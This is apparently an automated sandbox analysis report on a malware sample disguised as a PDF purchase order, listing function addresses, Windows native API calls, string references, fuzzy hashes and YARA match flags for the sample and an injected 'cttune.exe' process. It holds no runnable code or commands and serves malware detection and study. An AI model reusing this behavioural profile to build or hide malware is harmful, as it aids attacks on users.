Instruction Fuzzy Hash: 4C90023520250802DA10715C5808646408A97D1301F55D415A0468558DC65989A1A225

Function 01982C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: c26a46f40155d0af60f41735fc008435baf0626200742d2b07df4f600b439870
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 01982890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0198293C
___swprintf_l.LIBCMT ref: 0198295E
___swprintf_l.LIBCMT ref: 019829A3
___swprintf_l.LIBCMT ref: 019BA52E

Strings

::%hs%u.%u.%u.%u, xrefs: 019BA527
:%u.%u.%u.%u, xrefs: 019BA5B8
::ffff:0:%u.%u.%u.%u, xrefs: 019BA54E
ffff:, xrefs: 019BA504

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: b8905a6b86698fa9d1a5f658e03e25706355d167ec257ff177edf528c8e43843
Instruction ID: 390d1a32aab457465cdb5ae54ecb711d8e1bf31f59bb65c8478bce4d04e9a6b4
Opcode Fuzzy Hash: b8905a6b86698fa9d1a5f658e03e25706355d167ec257ff177edf528c8e43843
Instruction Fuzzy Hash: BA51E6B2A00116BFDF11EF9D898097EFBBCBB492417148229E46DD7641D374DE50C7A0

Function 019F2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 019F24A6
___swprintf_l.LIBCMT ref: 019F24E2
___swprintf_l.LIBCMT ref: 019F257D
___swprintf_l.LIBCMT ref: 019F25A3
___swprintf_l.LIBCMT ref: 019F25C8
___swprintf_l.LIBCMT ref: 019F2608

Strings

::%hs%u.%u.%u.%u, xrefs: 019F249E
::ffff:0:%u.%u.%u.%u, xrefs: 019F24DA
:%u.%u.%u.%u, xrefs: 019F25FF
ffff:, xrefs: 019F247D, 019F249D

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: ab05092538fb9f4825adad3969982f3a25b8cbd642c0ab672d95c800443dc9be
Instruction ID: 555dbddcc55781c2a2806daa82d5c0ac47ce8434ca06aaff7b9179cf276e9c9a
Opcode Fuzzy Hash: ab05092538fb9f4825adad3969982f3a25b8cbd642c0ab672d95c800443dc9be
Instruction Fuzzy Hash: 60510875A04645BFCB30DF9DC890A7FBBFCEB84201B04885DE69EC7641D6B4DA408760

Function 01977630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 019B4742
Execute=1, xrefs: 019B4713
ExecuteOptions, xrefs: 019B46A0
CLIENT(ntdll): Processing section info %ws..., xrefs: 019B4787
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 019B4655
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019B46FC
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 019B4725

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 67e4b62eb891f40f15d4b78c02bdd4747570e9d25e0a48832f0fa75a634fd821
Instruction ID: 678da6a5d91050a58fdad9f718e64edb17abdaa8d98dd56f23585a82f30275d3
Opcode Fuzzy Hash: 67e4b62eb891f40f15d4b78c02bdd4747570e9d25e0a48832f0fa75a634fd821
Instruction Fuzzy Hash: D2514A31A0021ABAEF15EBE8DC89FE977ADEF54700F0404A9E60DA7181E771AA41CF51

Function 0198B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0198B6BF

Strings

-, xrefs: 0198B650
0, xrefs: 0198B66F
0, xrefs: 0198B695
+, xrefs: 0198B65A

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: e28631a731677418fd59a607b61958cdba4464bee8b80712f67dada553acef22
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: 8D81E130E1124A8EEF25BE6CC850BFEBFB9AF45321F1C4519D86BA7691C7349840CB51

Function 019F20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 019F214F
___swprintf_l.LIBCMT ref: 019F2172

Strings

%%%u, xrefs: 019F2146
]:%u, xrefs: 019F2169
[, xrefs: 019F212B

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 03001704eb11f1a234e18842bfecde862564183c72e5a0465cedc8c3e1972c84
Instruction ID: 52c091a87252181e2fd5cb249b20f67aad219eb6599134a9382153af957730a2
Opcode Fuzzy Hash: 03001704eb11f1a234e18842bfecde862564183c72e5a0465cedc8c3e1972c84
Instruction Fuzzy Hash: E621337AE10119ABDB11DF69DC40AEE7BEDAF94654F44011AEA19D3240E730DA018BA5

Function 0196F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019B02E7
RTL: Re-Waiting, xrefs: 019B031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019B02BD

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: a534f2947b23445643396524a72d672326a21046aadbff796a643177506e5183
Instruction ID: 05a6c95f6e8dd8a40757bc1b9ef26e12eae00b4e2b7749b96fef3de745f64237
Opcode Fuzzy Hash: a534f2947b23445643396524a72d672326a21046aadbff796a643177506e5183
Instruction Fuzzy Hash: 5FE1EF306087429FD725CF2CD994B6ABBE8BF84314F180A5DF5A98B2E1D734D844CB52

Function 0197BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 019B7B8E
RTL: Re-Waiting, xrefs: 019B7BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 019B7B7F

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 4e4f7c1abed498543ad77b65ac1231864bd924e6d6a0c55e498bc19396882b3b
Instruction ID: 071465c7b84c4a6fcc1977e491ff12eceaed701049369b6f0b8c437e1d3a79a8
Opcode Fuzzy Hash: 4e4f7c1abed498543ad77b65ac1231864bd924e6d6a0c55e498bc19396882b3b
Instruction Fuzzy Hash: 6F41E2317047069FD724DE29C940B6AB7E9EF89B11F000A1DF95EDB280DB31E5058B91

Function 0197B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019B728C

Strings

RTL: Resource at %p, xrefs: 019B72A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 019B7294
RTL: Re-Waiting, xrefs: 019B72C1

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 963718d7ab027e94b5b04055e9231c242c29ebf9c8e1a1671cfb43f7b468bffc
Instruction ID: 4f744f56e53120fddc662c30c4f3aca512ea73486686a25442fbe240138f286e
Opcode Fuzzy Hash: 963718d7ab027e94b5b04055e9231c242c29ebf9c8e1a1671cfb43f7b468bffc
Instruction Fuzzy Hash: 3541F031700206ABC724DE69CD81FA6B7A5FFD4B11F100A19F95EAB280DB31E842C7D1

Function 019F2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 019F238D
___swprintf_l.LIBCMT ref: 019F23B3

Strings

%%%u, xrefs: 019F2384
]:%u, xrefs: 019F23AA

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 4d404c67786e49aee33fa26b00e39d377cac2e3a1155fdf64fbcb122c70d17ff
Instruction ID: c9a836eacd0326184106c82e0403cc920d64c6adda868c4d80ce856481685932
Opcode Fuzzy Hash: 4d404c67786e49aee33fa26b00e39d377cac2e3a1155fdf64fbcb122c70d17ff
Instruction Fuzzy Hash: 16318472A00619AFDB20DF2DCC40BEE77BCEB44611F444559E94DE3200EB70DA448BA1

Function 01987D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01987E8B

Strings

+, xrefs: 01987DE8
-, xrefs: 01987DDD

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: 5ad9ca3ae004ad3ae573d18ce675975b2022a84f7fbded479e2dd01e2e1daf13
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: 0591B871E002169BDB28FF9DC880ABEBBA9EF44321F74451AE95DE72D1D7309941C721

Function 01949126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 01949175
$, xrefs: 01949191

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 2e204dd2e087b20cd4d84903dcf3b510f2fc6fe78030dee9e47cdcbf37551b0b
Instruction ID: dfe940a2a40959d84a4c1a8ab170deca3ced959d7272f00eb6318fa637db8cfd
Opcode Fuzzy Hash: 2e204dd2e087b20cd4d84903dcf3b510f2fc6fe78030dee9e47cdcbf37551b0b
Instruction Fuzzy Hash: 20811975D012699BDB35CB54CC44BEEBBB8BB48754F0041EAAA1DB7280D7709E85CFA0

Analysis Process: cttune.exePID: 8048, Parent PID: 1440COMMON

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	4.3%
Signature Coverage:	2.5%
Total number of Nodes:	445
Total number of Limit Nodes:	70

Executed Functions

Function 03239DF0 Relevance: 45.5, Strings: 36, Instructions: 469
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3, xrefs: 0323A008
(, xrefs: 0323A110
CH, xrefs: 0323A117
^D, xrefs: 03239FFE
], xrefs: 0323A0AF
S:, xrefs: 03239E61
7, xrefs: 0323A1E2
;Z, xrefs: 03239E57
`{, xrefs: 03239F5F
u, xrefs: 0323A03A
o , xrefs: 0323A109
PB, xrefs: 03239F1C
`S:, xrefs: 0323A6EF
z, xrefs: 0323A073
M, xrefs: 0323A0A5
K^, xrefs: 0323A062
J[, xrefs: 03239F99
uV, xrefs: 0323A189
/, xrefs: 0323A07D
NM, xrefs: 03239F26
87, xrefs: 03239F08
I, xrefs: 0323A171
V, xrefs: 0323A155
CU, xrefs: 03239E2F
zX, xrefs: 03239FA7
d\, xrefs: 03239F92
3f, xrefs: 0323A17F
7, xrefs: 0323A16A
H, xrefs: 0323A026
cz, xrefs: 03239F69
uG, xrefs: 03239EC5
hY, xrefs: 03239FD6
t, xrefs: 0323A1C4
G0PB, xrefs: 0323A44D
T, xrefs: 0323A1A6
'c, xrefs: 03239EA7

Memory Dump Source

Source File: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3230000_cttune.jbxd

Yara matches

Similarity

API ID:
String ID: `S:$'c$/$3$3f$7$7$87$;Z$CH$CU$G0PB$H$I$J[$K^$M$NM$PB$S:$T$V$]$^D$`{$cz$d\$hY$o $t$u$uG$uV$z$zX$(
API String ID: 0-1050344858
Opcode ID: 23e43f61408b06b92b72e93506fbdf849e318b892e95a05641fda9ef13207fd6
Instruction ID: 7b73462f59787f66d123e6274fb52eb11a166347bc6ad023a1860af2e39aaeb5
Opcode Fuzzy Hash: 23e43f61408b06b92b72e93506fbdf849e318b892e95a05641fda9ef13207fd6
Instruction Fuzzy Hash: 9D42BFB0D15268CBEB24CF44C898BDDBBB2BB45308F1485D9D54A7B280C7B95AC8CF55

Function 0324C870 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 0324C954
FindNextFileW.KERNELBASE(?,00000010), ref: 0324C98F
FindClose.KERNELBASE(?), ref: 0324C99A

Memory Dump Source

Source File: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3230000_cttune.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: b3f0d38b4034c888d0ee3e074ceaa34372b226b920d7ac17fb6b8d6c2f47323a
Instruction ID: db4119052896c5efa7bf82c09b55aca63f15416cc745b533485ad3e56ca0e7d3
Opcode Fuzzy Hash: b3f0d38b4034c888d0ee3e074ceaa34372b226b920d7ac17fb6b8d6c2f47323a
Instruction Fuzzy Hash: 983153B65203197BDB24EB64CC85FFF777C9B44704F184558B918AB180D6B0AAD4CBA0

Function 03259330 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,6A84A4CD,?,?,?,?,?,?,?), ref: 03259425

Memory Dump Source

Source File: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3230000_cttune.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4afebb0a094bc7a73d8c7bc665e2dc52731ec6d75df0ba5ad104457950258b61
Instruction ID: 92cb980502a783eb2806a06157e276ac21c32b78f68afb001083893f4da725cf
Opcode Fuzzy Hash: 4afebb0a094bc7a73d8c7bc665e2dc52731ec6d75df0ba5ad104457950258b61
Instruction Fuzzy Hash: D131B6B5A10248AFDB14DF99D881EEFBBB9EF88300F108119FD19A7344D770A951CBA5

Function 03259490 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,?,6A84A4CD,?,?,?,?,?), ref: 0325956D

Memory Dump Source

Source File: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3230000_cttune.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1546d33ac782e5135d90267b4d8d30400cd7bd0890a31838246d027e4bc65b3c
Instruction ID: 07fcadb922d924fec0e8971fa55bf65ea8e05b6f40e0f1add201b2fdbae2dc74
Opcode Fuzzy Hash: 1546d33ac782e5135d90267b4d8d30400cd7bd0890a31838246d027e4bc65b3c
Instruction Fuzzy Hash: FE31E7B5A10248AFDB14DF99D881EEFB7B9EF88300F10811AFD18A7344D770A951CBA5

Function 03259770 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(0324204B,?,0325819F,6A84A4CD,00000004,00003000,?,?,?,?,?,0325819F,0324204B,?,?,0325B651), ref: 0325982C

Memory Dump Source

Source File: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3230000_cttune.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b525c5235d04267fda64a0dfec9f9cbabd5f77f8025979c30463ef53a727c7e1
Instruction ID: f875474c08df1276a3f2fe4cd7622a8dece23299c0570da37f207061f4e08bb6
Opcode Fuzzy Hash: b525c5235d04267fda64a0dfec9f9cbabd5f77f8025979c30463ef53a727c7e1
Instruction Fuzzy Hash: 03212DB5A10249AFDB10DF98DC41EAFB7B9EF88700F10410AFE18AB244D770A951CBA5

Function 03259580 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(?), ref: 0325960A

Memory Dump Source

Source File: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3230000_cttune.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 530c8a5737b2f286417010fde17f045dd0a14b14d7af6a76751485b30b7dd710
Instruction ID: 409b36e7787e16a540a1f6a0d7b92b5d5e94da7d6b2d1f89837bc8ad4d9d96de
Opcode Fuzzy Hash: 530c8a5737b2f286417010fde17f045dd0a14b14d7af6a76751485b30b7dd710
Instruction Fuzzy Hash: 7F1173759206046BD620EBA5DC41FABB76CDF85710F40410AFE089B280D7B1B656CBE5

Function 03259620 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 03259654

Memory Dump Source

Source File: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3230000_cttune.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 6ccdd4b3c537907601f230bce43c5b9176195eb5b89fb8544d878d0038bffd2d
Instruction ID: 91b8e23cde65071ced0ad9f62dc421e09199f0372957d63c9caf6591ad9cbc0e
Opcode Fuzzy Hash: 6ccdd4b3c537907601f230bce43c5b9176195eb5b89fb8544d878d0038bffd2d
Instruction Fuzzy Hash: A4E046366202147BE620EA69DC41FDB776CEFC5760F408415FA08AB281C6B0B9128BF0

Function 05294650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0529465A

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bcb20833ae154a8e4fa72d8c79d0acab5398fd18b76cfe7d13c6560bfe088ba8
Instruction ID: 7319bb42b3a99a89246181b715967d4e8dd63428c7d1f1bc89c4b166e44756d5
Opcode Fuzzy Hash: bcb20833ae154a8e4fa72d8c79d0acab5398fd18b76cfe7d13c6560bfe088ba8
Instruction Fuzzy Hash: FE9002A3B115004341407198484440660159BE13013D5C115A1554560D865889559269

Function 05294340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0529434A

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ddcde57dcd623d1a057043a90d7d7a4bd7ba9b51fdbce03492eb8347a639ca6f
Instruction ID: d6531115a003bf6ed418c090ac013b22a0f52005666ff97611205a00bda151a6
Opcode Fuzzy Hash: ddcde57dcd623d1a057043a90d7d7a4bd7ba9b51fdbce03492eb8347a639ca6f
Instruction Fuzzy Hash: 72900273B15800139140719848C454640159BE0301B95C011E1424554D8A548A565361

Function 05292D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05292D3A

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8953181ee0cf73f7a5aac668209e83bb2ae7aa07ca73d55b07dedd5c78ca61ed
Instruction ID: f331ca3043b59cc3975a95ae0547a27d4021d4dbaf7523386742e44f8acc6aee
Opcode Fuzzy Hash: 8953181ee0cf73f7a5aac668209e83bb2ae7aa07ca73d55b07dedd5c78ca61ed
Instruction Fuzzy Hash: C890047371140003D14071DC545C7074015DFF1301FD5D011F1414554DDD55CD575333

Function 05292D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05292D1A

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aaa32ba63d38e6066c673ca549774a3c9ab4619884a2dcc5d7f07ff85d8ce244
Instruction ID: a29de0d69c94a22c610617675ca5d5bbdccda1a084b7de748ddd7842d0c3b21c
Opcode Fuzzy Hash: aaa32ba63d38e6066c673ca549774a3c9ab4619884a2dcc5d7f07ff85d8ce244
Instruction Fuzzy Hash: 1F90026B72340003D1807198544860A00158BD1302FD5D415A1015558DC95589695321

Function 05292DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05292DFA

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 45bc8b907d262d850291293e6d9f4c5064eab781bce0438af1ef96b69099bda1
Instruction ID: 20f47d4795d4d93d617186cbb9ff75ef4c358620091e7958ed2410acc071e0c3
Opcode Fuzzy Hash: 45bc8b907d262d850291293e6d9f4c5064eab781bce0438af1ef96b69099bda1
Instruction Fuzzy Hash: A290027371140413D1117198454470700198BD0341FD5C412A1424558E96968A52A121

Function 05292DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05292DDA

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fe14c7d0114e4aa6cf3d15a29cebc620ceab34844873c9ada5ec59a39dd02c07
Instruction ID: 81dcba323e7d3de7089026af1b29ea56d986b650a60fb327487c9c89fe733f92
Opcode Fuzzy Hash: fe14c7d0114e4aa6cf3d15a29cebc620ceab34844873c9ada5ec59a39dd02c07
Instruction Fuzzy Hash: BE900263752441535545B198444450740169BE03417D5C012A2414950D85669956D621

Function 05292C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05292C6A

Memory Dump Source

